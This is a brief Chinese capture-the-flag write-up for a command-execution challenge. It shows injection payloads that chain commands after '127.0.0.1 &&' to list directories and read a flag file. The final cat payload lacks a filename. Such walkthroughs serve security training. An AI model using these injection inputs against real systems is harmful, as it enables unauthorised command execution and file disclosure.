|command_execution|命令执行



执行一个ping命令127.0.0.1成功

尝试在ping命令后面执行其他命令,用到管道符&&

查看上级目录
payload:127.0.0.1 && ls ../../../

尝试访问因为已经回到根目录了,尝试查看路径,最终在home下发现flag.txt文件
payload:127.0.0.1 && ls ../../../home/

这时候打开.txt文件,需要用cat (打开文件与访问路径有区别)
payload:127.0.0.1 && cat ../../../home/

得到flag

浙公网安备 33010602011771号